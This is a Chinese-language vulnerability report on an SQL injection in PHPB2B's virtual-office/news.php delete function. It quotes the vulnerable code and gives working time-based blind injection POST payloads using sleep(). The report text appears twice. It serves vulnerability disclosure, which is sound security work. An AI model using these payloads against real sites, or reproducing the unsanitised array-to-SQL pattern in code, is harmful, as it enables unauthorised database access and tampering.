### 简要描述:
PHPB2B某处sql注入#4
### 详细说明:
PHPB2B某处sql注入
官网下载的最新版本
virtual-office/news.php
73-80行
```
if (isset($_POST['del'])) {
$result = $companynews->del($_POST['newsid'], $conditions);
if ($result) {
flash("success");
}else {
flash("action_failed");
}
}
```
post的数据传入del函数,跟入看看。
```
function del($ids, $conditions = null, $table = null)
{
$del_id = $this->primaryKey;
$tmp_ids = $condition = null;
if (is_array($ids))
{
$tmp_ids = implode(",",$ids);
$cond[] = "{$del_id} IN ({$tmp_ids})";
$this->catchIds = serialize($ids);
}
else
{
$cond[] = "{$del_id}=".intval($ids);
$this->catchIds = $ids;
}
if (!empty($table)) {
$table_name = $this->table_prefix.$table;
}else{
$table_name = $this->getTable();
}
if(!empty($conditions)) {
if(is_array($conditions)) {
$tmp_where_cond = implode(" AND ", $conditions);
$cond[] = $tmp_where_cond;
}
else {
$cond[] = $conditions;
}
}
$this->setCondition($cond);
$sql = "DELETE FROM ".$table_name.$this->getCondition();
$deleted = $this->dbstuff->Execute($sql);
unset($this->condition);
return $deleted;
}
```
关键在这一句
if (is_array($ids))
{
$tmp_ids = implode(",",$ids);
$cond[] = "{$del_id} IN ({$tmp_ids})";
$this->catchIds = serialize($ids);
}
else
{
$cond[] = "{$del_id}=".intval($ids);
$this->catchIds = $ids;
}
如果传入的ids是个数组的话,就没有intval强制类型转换了,并且两边没有用单引号括起来。于是这里出现了注入,无视GPC。
因为是delete型,时间盲注。
演示。
POST提交url
localhost/phpb2b/virtual-office/news.php
提交内容
del=1&newsid[]=1123,123)||if(1=1,sleep(3),0)%23
成功延时
del=1&newsid[]=1123,123)||if(1=2,sleep(3),0)%23
不延时
PS:工作人员在测试时,一定记得先加上一条新闻,确保表中有数据
### 漏洞证明:
PHPB2B某处sql注入
官网下载的最新版本
virtual-office/news.php
73-80行
```
if (isset($_POST['del'])) {
$result = $companynews->del($_POST['newsid'], $conditions);
if ($result) {
flash("success");
}else {
flash("action_failed");
}
}
```
post的数据传入del函数,跟入看看。
```
function del($ids, $conditions = null, $table = null)
{
$del_id = $this->primaryKey;
$tmp_ids = $condition = null;
if (is_array($ids))
{
$tmp_ids = implode(",",$ids);
$cond[] = "{$del_id} IN ({$tmp_ids})";
$this->catchIds = serialize($ids);
}
else
{
$cond[] = "{$del_id}=".intval($ids);
$this->catchIds = $ids;
}
if (!empty($table)) {
$table_name = $this->table_prefix.$table;
}else{
$table_name = $this->getTable();
}
if(!empty($conditions)) {
if(is_array($conditions)) {
$tmp_where_cond = implode(" AND ", $conditions);
$cond[] = $tmp_where_cond;
}
else {
$cond[] = $conditions;
}
}
$this->setCondition($cond);
$sql = "DELETE FROM ".$table_name.$this->getCondition();
$deleted = $this->dbstuff->Execute($sql);
unset($this->condition);
return $deleted;
}
```
关键在这一句
if (is_array($ids))
{
$tmp_ids = implode(",",$ids);
$cond[] = "{$del_id} IN ({$tmp_ids})";
$this->catchIds = serialize($ids);
}
else
{
$cond[] = "{$del_id}=".intval($ids);
$this->catchIds = $ids;
}
如果传入的ids是个数组的话,就没有intval强制类型转换了,并且两边没有用单引号括起来。于是这里出现了注入,无视GPC。
因为是delete型,时间盲注。
演示。
POST提交url
localhost/phpb2b/virtual-office/news.php
提交内容
del=1&newsid[]=1123,123)||if(1=1,sleep(3),0)%23
成功延时
del=1&newsid[]=1123,123)||if(1=2,sleep(3),0)%23
不延时
PS:工作人员在测试时,一定记得先加上一条新闻,确保表中有数据
京公网安备 11010502034610号
暂无评论